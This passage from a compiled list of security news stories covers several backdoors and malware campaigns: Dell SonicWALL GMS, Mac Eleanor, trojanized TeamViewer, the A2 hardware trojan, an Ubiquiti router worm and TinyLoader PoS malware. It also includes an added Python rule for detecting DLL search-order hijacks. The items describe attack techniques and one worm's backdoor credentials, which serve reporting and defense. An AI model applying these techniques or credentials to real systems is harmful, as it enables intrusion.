US-based security firm Digital Defense, Inc. (DDI) found the issues and reported the problems to Dell, which today released patches to address all reported bugs.

DDI says the issues are in the Dell SonicWALL Global Management System (GMS), a centralized management, reporting, and monitoring solution for SonicWALL appliances, such as the company's VPNs and firewalls. According to an advisory released today, DDI's team reveals details about a hidden default account that uses an easily guessable password.

Five more issues discovered

Additionally, the research team also discovered two unauthenticated root command injections that lead to RCE (remote code execution) with root privileges on Dell equipment. Add to this two more unauthenticated XML External Entity Injection (XXE) bugs and another issue that allowed unauthenticated network configuration changes via the GMC service, and all of a sudden you have a very good reason to apply Dell's patches if running such equipment in your network.

Dell acknowledged all reports and issued patches today for all affected customers that are deploying the GMS platform. Dell is just the latest network equipment vendor caught with a backdoor on its devices after the same had happened to Fortinet and Juniper.

Source
20. Macs targeted with new Backdoor.MAC.Eleanor trojan

Backdoor control panel, crook's view

Above is an image of what the crook sees when accessing your Mac's Tor .onion link.

Security researchers from Bitdefender have discovered a new malware family that opens a backdoor via the Tor network on Mac OS X systems. The malware's technical name is Backdoor.MAC.Eleanor, and currently, its creators are distributing it to victims as EasyDoc Converter, a Mac app that allows users to convert files by dragging them over a small window.

In reality, Bitdefender says the app only downloads and runs a malicious script that installs and registers at startup three new components: the Tor hidden service, a PHP Web service, and a Pastebin client.

Backdoor.MAC.Eleanor creates a .onion address for your Mac

The Tor service will automatically connect the infected computer to the Tor network, and generate a .onion domain through which the attacker can access the user's system using only a browser. The PHP Web service is the receiving end of that connection, being also tasked with interpreting the commands it receives from the crook's control panel to the local Mac operating system.

Here is where the Pastebin agent intervenes because the agent takes the locally generated .onion domain and uploads it in a Pastebin URL, after being encrypted with a public key using RSA and base64 algorithms. Crooks can access this PasteBin link, and parse it for new entries to their botnet.

Backdoor provides a lot of remote management options

Bitdefender's team says that Backdoor.MAC.Eleanor allows criminals to navigate and interact with the local filesystem, launch reverse shells to execute root commands, and launch and execute all kinds of PHP, PERL, Python, Ruby, Java, or C scripts. Additionally, the attackers can also list locally running apps, use the infected computer to send emails, use it as an intermediary point to connect and administer databases, and scan remote firewalls for open ports.
The infected computer basically becomes a bot in the crook's botnet, which can at any time use it to send out massive spam campaigns, steal sensitive data from the infected system, use it as a DDoS bot, or install other malware.

Article source
21. Users of the TeamViewer remote-access service have been complaining in recent weeks about how their systems have been hacked into, unauthorized purchases made on their cards, their bank accounts emptied. Initially it was believed that this was due to a hack into TeamViewer itself, but the company has denied this. Instead, they have blamed password re-use, especially with millions of old passwords in the wild thanks to disclosed social network breaches. Others have speculated that malware could be in use somehow, and that may be the case.

We have evidence that trojanized TeamViewer installer packages have been used in a spam campaign that resulted in attackers gaining remote access to various systems. While this particular spam campaign used an old version of TeamViewer, we can't dismiss the possibility of other attacks using newer versions.

This spam campaign targeted users in Italy, using a variety of subject lines such as the following (English translation in parentheses):

Accesso dati (Data access)
Il tuo ID e stato usato (Your ID was used)
Prova gratuita 30 giorni (Free 30-day trial)
Conferma dell'ordine (Order confirmation)
Il tuo conto informazione (Your account information)
Finanziamento?????? (Financing)

A simple .JS (JavaScript) file was attached to these messages; when run, this file downloads various files onto the system:

A keylogger, detected as TSPY_DRIDEX.YYSUV
A "Trojanized" version of TeamViewer, detected as BKDR_TEAMBOT.MNS
A batch file which executes the above two items, then deletes itself

This particular Trojanized version that the malware installs is very old – version 6.0.17222.0. TeamViewer 6 was first released in December 2010 and was superseded by version 7 in November 2011. Secondly, it is installed in an unusual location: %APPDATA%\Div. (Some variants installed their copy into %APPDATA%/Addins instead.) This behavior is consistent across all the various permutations of this attack we have seen.
This version of TeamViewer was Trojanized, but not by modifying the legitimate version. Instead, it includes an additional DLL – avicap32.dll. (This malicious DLL is detected as BKDR_TEAMBOT.DLL.) In a classic case of DLL search order hijacking, the legitimate TeamViewer application loads two functions from this DLL, the legitimate version of which is part of Windows. However, the presence of the malicious version allows an attacker to take control of the TeamViewer application.

This particular campaign targeted users in Italy for a month, ample time to gather all of a victim's usernames and passwords. The presence of a Trojanized TeamViewer version raises the possibility that a newer version may exist in the wild and account for some of the recent attacks.

One more thing to note is that the TeamViewer administrators may be able to limit the damage of old versions. All TeamViewer connections are initially mediated by company servers. It may be possible for connections from these unsupported versions to be disconnected at this handshake stage, preventing any malicious use from progressing. It would unfortunately also cut out any users of these old versions.

Trend Micro endpoint solutions such as Trend Micro™ Security, Smart Protection Suites, and Worry-Free™ Business Security can protect users and SMBs from this threat by detecting malicious files, and spammed messages as well as blocking all related malicious URLs. On the other hand, our Trend Micro Deep Discovery has an email inspection layer that can protect enterprises by detecting malicious attachments and URLs.

The following hashes are related to this attack

Article source
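The hijack described in the post above turns on one simple fact: a Windows-shipped DLL name (avicap32.dll) was resolved from the application's own folder under %APPDATA% instead of from the system directory. The following hunting rule is an added example written for this page, not code from Trend Micro or from the original post; it flags exactly that pattern over image-load telemetry. The input rows, the allow-listed system directories and the watch-list of DLL names are constructed for the example (a real deployment would feed it Sysmon image-load events or EDR data and a fuller list).

```python
"""Added example: hunting rule for DLL search-order hijacks of the kind
described in the post (a Windows DLL name loaded from a non-system folder).
All sample data below is constructed for illustration."""
import ntpath

# Directories where Windows keeps its own copies of these DLLs (assumption
# for the example; adjust to the drive letters and layout of your estate).
SYSTEM_DIRS = (r"C:\Windows\System32", r"C:\Windows\SysWOW64")

# Windows-shipped DLL names worth watching. avicap32.dll is the one named in
# the post; the other two are constructed additions, not an exhaustive list.
WINDOWS_DLL_NAMES = {"avicap32.dll", "version.dll", "dwmapi.dll"}

# Constructed sample of (process image, loaded module) pairs, standing in for
# image-load telemetry such as Sysmon Event ID 7.
SAMPLE_LOAD_EVENTS = [
    # Legitimate: the system copy loaded from System32.
    (r"C:\Program Files\TeamViewer\TeamViewer.exe",
     r"C:\Windows\System32\avicap32.dll"),
    # Suspicious: same DLL name, but resolved from the app folder under %APPDATA%.
    (r"C:\Users\alice\AppData\Roaming\Div\TeamViewer.exe",
     r"C:\Users\alice\AppData\Roaming\Div\avicap32.dll"),
    # Legitimate: an unrelated system DLL from System32.
    (r"C:\Users\alice\AppData\Roaming\Div\TeamViewer.exe",
     r"C:\Windows\System32\kernel32.dll"),
    # Legitimate: an application's own private DLL, not a Windows name.
    (r"C:\Program Files\Foo\foo.exe",
     r"C:\Program Files\Foo\foo_helper.dll"),
]


def is_in_system_dir(module_path):
    """True if the module path sits under one of SYSTEM_DIRS.

    ntpath.normcase lower-cases and normalises separators on any host OS, so
    the comparison is case-insensitive like the Windows file system."""
    norm = ntpath.normcase(module_path)
    return any(norm.startswith(ntpath.normcase(d) + "\\") for d in SYSTEM_DIRS)


def find_hijack_candidates(load_events):
    """Return the (process, module) pairs that look like search-order hijacks:
    a Windows-shipped DLL name that was resolved outside the system directories."""
    hits = []
    for process, module in load_events:
        name = ntpath.basename(ntpath.normcase(module))
        if name in WINDOWS_DLL_NAMES and not is_in_system_dir(module):
            hits.append((process, module))
    return hits


if __name__ == "__main__":
    for process, module in find_hijack_candidates(SAMPLE_LOAD_EVENTS):
        print(f"possible DLL search-order hijack: {process} loaded {module}")
```

Run against the constructed rows it reports only the second event. The rule deliberately keys on the module's directory rather than on a hash, so it also catches a recompiled DLL; false positives come from software that legitimately ships a private copy of a Windows DLL, which is why the watch-list should be curated rather than set to every DLL under System32.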
22. Security flaws in software can be tough to find. Purposefully planted ones—hidden backdoors created by spies or saboteurs—are often even stealthier. Now imagine a backdoor planted not in an application, or deep in an operating system, but even deeper, in the hardware of the processor that runs a computer. And now imagine that silicon backdoor is invisible not only to the computer's software, but even to the chip's designer, who has no idea that it was added by the chip's manufacturer, likely in some far-flung Chinese factory. And that it's a single component hidden among hundreds of millions or billions. And that each one of those components is less than a thousandth of the width of a human hair.

In fact, researchers at the University of Michigan haven't just imagined that computer security nightmare; they've built and proved it works. In a study that won the "best paper" award at last week's IEEE Symposium on Privacy and Security, they detailed the creation of an insidious, microscopic hardware backdoor proof-of-concept. And they showed that by running a series of seemingly innocuous commands on their minutely sabotaged processor, a hacker could reliably trigger a feature of the chip that gives them full access to the operating system. Most disturbingly, they write, that microscopic hardware backdoor wouldn't be caught by practically any modern method of hardware security analysis, and could be planted by a single employee of a chip factory.

"Detecting this with current techniques would be very, very challenging if not impossible," says Todd Austin, one of the computer science professors at the University of Michigan who led the research. "It's a needle in a mountain-sized haystack." Or as Google engineer Yonatan Zunger wrote after reading the paper: "This is the most demonically clever computer security attack I've seen in years."

Analog Attack

The "demonically clever" feature of the Michigan researchers' backdoor isn't just its size, or that it's hidden in hardware rather than software. It's that it violates the security industry's most basic assumptions about a chip's digital functions and how they might be sabotaged. Instead of a mere change to the "digital" properties of a chip—a tweak to the chip's logical computing functions—the researchers describe their backdoor as an "analog" one: a physical hack that takes advantage of how the actual electricity flowing through the chip's transistors can be hijacked to trigger an unexpected outcome. Hence the backdoor's name: A2, which stands for both Ann Arbor, the city where the University of Michigan is based, and "Analog Attack."

Here's how that analog hack works: After the chip is fully designed and ready to be fabricated, a saboteur adds a single component to its "mask," the blueprint that governs its layout. That single component or "cell"—of which there are hundreds of millions or even billions on a modern chip—is made out of the same basic building blocks as the rest of the processor: wires and transistors that act as the on-or-off switches that govern the chip's logical functions. But this cell is secretly designed to act as a capacitor, a component that temporarily stores electric charge.

This diagram shows the size of the processor created by the researchers compared with the size of the malicious cell that triggers its backdoor function. (Image: University of Michigan)

Every time a malicious program—say, a script on a website you visit—runs a certain, obscure command, that capacitor cell "steals" a tiny amount of electric charge and stores it in the cell's wires without otherwise affecting the chip's functions.
With every repetition of that command, the capacitor gains a little more charge. Only after the "trigger" command is sent many thousands of times does that charge hit a threshold where the cell switches on a logical function in the processor to give a malicious program the full operating system access it wasn't intended to have.

"It takes an attacker doing these strange, infrequent events in high frequency for a duration of time," says Austin. "And then finally the system shifts into a privileged state that lets the attacker do whatever they want."

That capacitor-based trigger design means it's nearly impossible for anyone testing the chip's security to stumble on the long, obscure series of commands to "open" the backdoor. And over time, the capacitor also leaks out its charge again, closing the backdoor so that it's even harder for any auditor to find the vulnerability.

New Rules

Processor-level backdoors have been proposed before. But by building a backdoor that exploits the unintended physical properties of a chip's components—their ability to "accidentally" accumulate and leak small amounts of charge—rather than their intended logical function, the researchers say their backdoor component can be a thousandth the size of previous attempts. And it would be far harder to detect with existing techniques like visual analysis of a chip or measuring its power use to spot anomalies.

"We take advantage of these rules 'outside of the Matrix' to perform a trick that would [otherwise] be very expensive and obvious," says Matthew Hicks, another of the University of Michigan researchers. "By following that different set of rules, we implement a much more stealthy attack."

The Michigan researchers went so far as to build their A2 backdoor into a simple open-source OR1200 processor to test out their attack.
Since the backdoor mechanism depends on the physical characteristics of the chip's wiring, they even tried their "trigger" sequence after heating or cooling the chip to a range of temperatures, from negative 13 degrees to 212 degrees Fahrenheit, and found that it still worked in every case.

Here you can see the experimental setup the researchers used to test their backdoored processor at different temperatures. (Image: University of Michigan)

As dangerous as their invention sounds for the future of computer security, the Michigan researchers insist that their intention is to prevent such undetectable hardware backdoors, not to enable them. They say it's very possible, in fact, that governments around the world may have already thought of their analog attack method. "By publishing this paper we can say it's a real, imminent threat," says Hicks. "Now we need to find a defense."

But given that current defenses against detecting processor-level backdoors wouldn't spot their A2 attack, they argue that a new method is required: Specifically, they say that modern chips need to have a trusted component that constantly checks that programs haven't been granted inappropriate operating-system-level privileges. Ensuring the security of that component, perhaps by building it in secure facilities or making sure the design isn't tampered with before fabrication, would be far easier than ensuring the same level of trust for the entire chip.

They admit that implementing their fix could take time and money. But without it, their proof-of-concept is intended to show how deeply and undetectably a computer's security could be corrupted before it's ever sold. "I want this paper to start a dialogue between designers and fabricators about how we establish trust in our manufactured hardware," says Austin. "We need to establish trust in our manufacturing, or something very bad will happen."

Article source
23. Law enforcement's need for information access is critical and should be supported—but only in ways that ensure the individual's personal privacy. That was the message from European Data Protection Supervisor Giovanni Buttarelli, speaking at the first public event that Europol has held on the specific subject of privacy.

Against the backdrop of several important court cases, as well as calls for enabling surveillance for counter-terrorism purposes, Buttarelli pointed out [PDF] that in many cases, law enforcement's counter-terrorism flaws come down to poor collaboration rather than a lack of information. For instance, he noted that it is likely that most of the Paris and Brussels attackers were known to the local police as criminals, jihadis or some foreign fighters, and that information on them was included in the relevant EU databases.

"Of course law enforcement authorities need to do everything possible to fulfil their public function of ensuring law and order and justice for victims of crime and terrorism," Buttarelli said, calling for more information and analysis. "The EU's Counter Terrorism Coordinator recently told the JHA Council that there are still 'significant gaps with regard to feeding Europol' with information necessary on foreign terrorist fighters. This is an urgent problem because of the need for Europol to help match criminality and terrorist activity."

He also discussed the idea of backdoors, comparing them to the state instructing all architects and construction companies to weaken, in a secret way, one of the points of entry in every private residence. "Backdoors are not the solution to cybersecurity; they would be a new and dangerous part of the problem. What we need instead is to reinforce the global infrastructure, not to weaken it, to ensure that not only citizens but governments also are secure against attacks."

He noted that a backdoor would be fundamentally different from the traditional wiretap.
"Much more so than our homes, our mobile devices now contain revealing and sensitive data on almost every aspect of our lives, private and professional," he said. "A trojan horse or built-in vulnerability in all smart phones, tablets and PCs would allow collection and retention of personal information on a much greater scale than ever before. It would set a precedent for the emerging Internet of Things where a whole range of everyday devices and objects will be connected."

He also said that now may be time to consider establishing a right to encrypt, in addition to any moves to reinforce law enforcement capabilities.

He said that Europe has taken "a massive step in the right direction" with the final adoption of the General Data Protection Regulation and of the Directive for data protection in the police and judicial sector, as well as the adoption of the Europol Regulation, which will make Buttarelli's department responsible, in 2017, for supervising compliance of personal data processing.

The balancing of privacy and law enforcement needs was played out in two separate cases in Germany and Italy—with different outcomes. The German Federal Constitutional Court recently ruled on the police use of tracking devices in international terrorism cases, and found that privacy safeguards, transparency to parliament, public and individual legal protection and judicial review must be taken into account. "According to the Court, it was disproportionate to use wiretap for more than just the most serious offences; and there were limits on the interference with the private spheres of individuals who are not suspected of terrorist activities," he said.
"And it was disproportionate also to transfer personal data to third countries where there were no guarantees of protection of the fundamental rights of the individuals in question."

Meanwhile, the Italian Court of Cassation said in April that evidence acquired through trojan horses installed on electronic equipment could indeed be admissible in the most serious cases: anti-Mafia and anti-organized crime efforts, and to combat terrorism.

"The FBI-Apple argument in the wake of San Bernardino is just an early skirmish in a long battle," he said. "A broad and informed public debate is now needed, just as President Obama himself has said. Is the question really one of privacy versus security, or is it rather one of overall security versus decryption?"

Article source
24. A worm targeting wireless network equipment developed by US-based Ubiquiti Networks has already managed to compromise thousands of routers across the world. To spread it, whoever is behind these attacks is exploiting an old bug in airOS, the firmware that runs on the company's networking devices.

"From the samples we have seen, there are 2 different payloads that use the same exploit. We have confirmed these variations are using a known exploit that was reported and fixed last year," Ubiquiti noted. "This is an HTTP/HTTPS exploit that doesn't require authentication. Simply having a radio on outdated firmware and having its http/https interface exposed to the Internet is enough to get infected. We are also recommending restricting all access to management interfaces via firewall filtering."

According to Symantec researchers, once it leverages the exploit, the worm copies itself on the device and creates a backdoor account with the following username/password combination: mother/fucker. It then adds iptables rules to block administrators from accessing the device through a web interface over HTTP/HTTPS, copies itself once again to achieve persistence despite router restarts, and downloads a precompiled version of cURL, with the help of which it will spread to other routers within the same subnet and on other networks. Once a new device is compromised, the entire sequence is repeated.

"So far this malware doesn't seem to perform any other activities beyond creating a back door account, blocking access to the device, and spreading to other routers," the researchers noted. "It's likely that the attackers behind this campaign may be spreading the worm for the sheer challenge of it. It could also be evidence of an early, exploratory phase of a larger operation.
Either way, this campaign potentially grants the attackers access to a large amount of routers, putting their targets' infrastructure at risk."

During the same period, Symantec's honeypot routers have repeatedly been hit with access attempts using default Ubiquiti credentials, but it's unknown if these attacks are connected.

Ubiquiti has provided a list of devices/firmware versions that are safe from the exploit, and has advised users of others to update their firmware. They have also provided a removal tool for the worm, which also has the option to upgrade firmware to the latest version (5.6.5).

Article source
25. On their own, a multicomponent backdoor and a point-of-sale (PoS) malware can pose great threats to enterprises and small and medium-sized businesses (SMBs). As a tandem, these two can lead to stealthier and more flexible attacks. But add another PoS malware to the mix, and you've got even bigger trouble. TinyLoader, AbaddonPOS, and TinyPOS are doing just that, infecting systems in Europe and North America.

TinyLoader, a backdoor known for infecting systems with other malware, was first seen distributing AbaddonPOS PoS malware around November 2015. When we noticed a sudden spike in AbaddonPOS detections this January, TinyPOS, another PoS malware strain, also reared its ugly head at that time. Our analysis suggests that these two PoS threats are related, and not only in terms of how they are distributed and upgraded. We surmise that the operators behind these two seemingly separate PoS threats are one and the same.

The role of TinyLoader

To figure out if AbaddonPOS and TinyPOS are indeed connected, we looked at what they had in common—TinyLoader. This backdoor is a known means for introducing secondary infections to systems. Note though that it is not the primary or sole indicator of PoS malware infection.

TinyLoader has two small components—a screen grabber and a process enumerator. These modules are used to gather information or reconnaissance on infected systems. After TinyLoader diagnoses an infected system, it chooses the appropriate payload to deliver to the machine.

Figure 1. TinyLoader uses two components for reconnaissance

As has been said, TinyLoader started distributing AbaddonPOS variants in November 2015. We have been detecting AbaddonPOS variants as BKDR_TINY, BKDR64_TINY, or TROJ_TINY. Based on our Smart Protection Network data, Asia Pacific and Europe are heavily affected by TinyLoader from the period of January-April 2016.

Figure 2. The number of TinyLoader-related infections from January to April 2016

Analysis also revealed that apart from spreading AbaddonPOS variants, TinyLoader also has a hand in managing the malware's upgrades. As it turns out, TinyLoader also distributes TinyPOS variants. But that is not conclusive. So we sought to further compare AbaddonPoS with TinyPOS.

We looked at how newer versions of AbaddonPOS were distributed and found that the initial versions of TinyPOS were distributed the same way. AbaddonPOS was tested first via selective deployment, and only when these deployments proved successful did the operators go for wide distribution. We have yet to see a mass deployment of TinyPOS but we're already seeing infections within the United States and some parts of Europe.

Trend Micro protects customers from all threats related to TinyLoader. To protect enterprises from malware with PoS RAM-scraping capabilities, it is best to employ endpoint application control, which reduces attack exposure by ensuring only updates associated with whitelisted applications can be installed. Endpoint solutions such as Trend Micro™ Security, Trend Micro™ Smart Protection Suites, and Trend Micro Worry-Free™ Business Security can protect users' systems from AbaddonPOS, TinyPOS, and the TinyLoader backdoor by detecting these malicious files.

For more details on how TinyLoader serves as a software management suite for deploying and upgrading AbaddonPOS and TinyPOS, and seemingly links the two threats together, read our technical brief.

Article source